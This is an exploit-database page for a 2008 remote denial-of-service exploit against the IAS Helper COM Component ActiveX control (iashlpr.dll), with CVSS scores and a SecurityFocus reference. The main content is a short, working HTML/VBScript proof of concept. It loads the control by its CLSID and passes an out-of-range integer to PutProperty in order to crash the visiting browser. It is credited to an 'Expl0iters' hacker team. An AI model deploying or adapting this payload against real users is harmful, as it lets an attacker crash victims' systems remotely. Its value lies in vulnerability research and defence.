IAS Helper COM Component (iashlpr.dll) activex remote DOS

2008.10.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-189


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" """ :::::: :: :: :: :: :: :::: """ """ :: :: :: :: :::::: .. :::: :: """ """ ::::: ::: ::::: :: :: :: :: :: :::: """ """ :: :: :: :: : :: :: :: :: :: :: """ """ :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """ """ :: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""" # Tilte: iashlpr.dll activex remote DOS # Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r] # Author........................................: [hamedata] # E-mail........................................: [hamedata (at) gmail (dot) com [email concealed]] # Location .....................................: [Iran] # Software .....................................: [IAS Helper COM Component] # Sp Tanx2 .....................................: [ALL HACKERS] # Vulnerability: Remote DOS Exploit # Part Expl0it & Bug Codes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=- <html> <object classid='clsid:6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D' id='target' /></object> <input language=VBScript onclick=try() type=button value='start'> <script language='vbscript'> Sub try bad_data=-2147483647 secondarg="expl0iters" target.PutProperty bad_data ,secondarg End Sub </script> </html> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=- # Part Contact : Contact me : hamedata (at) gmail (dot) com [email concealed] Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM

References:

http://www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top